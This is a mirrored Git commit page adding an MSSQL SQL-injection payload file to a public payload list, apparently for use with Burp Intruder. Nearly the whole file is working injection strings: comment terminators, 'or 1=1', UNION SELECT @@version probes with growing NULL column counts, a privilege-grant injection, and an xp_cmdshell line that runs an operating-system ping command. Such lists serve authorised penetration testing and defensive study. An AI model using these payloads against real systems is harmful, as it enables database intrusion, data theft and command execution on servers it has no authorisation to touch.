mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-29 16:15:05 +00:00
Intruder Payloads
Add Intruder Payloads
This commit is contained in:
12
Intruder/detect/MSSQL/MSSQL.txt
Normal file
12
Intruder/detect/MSSQL/MSSQL.txt
Normal file
@@ -0,0 +1,12 @@
|
||||
; --
|
||||
'; --
|
||||
'); --
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
' grant connect to name; grant resource to name; --
|
||||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
Reference in New Issue
Block a user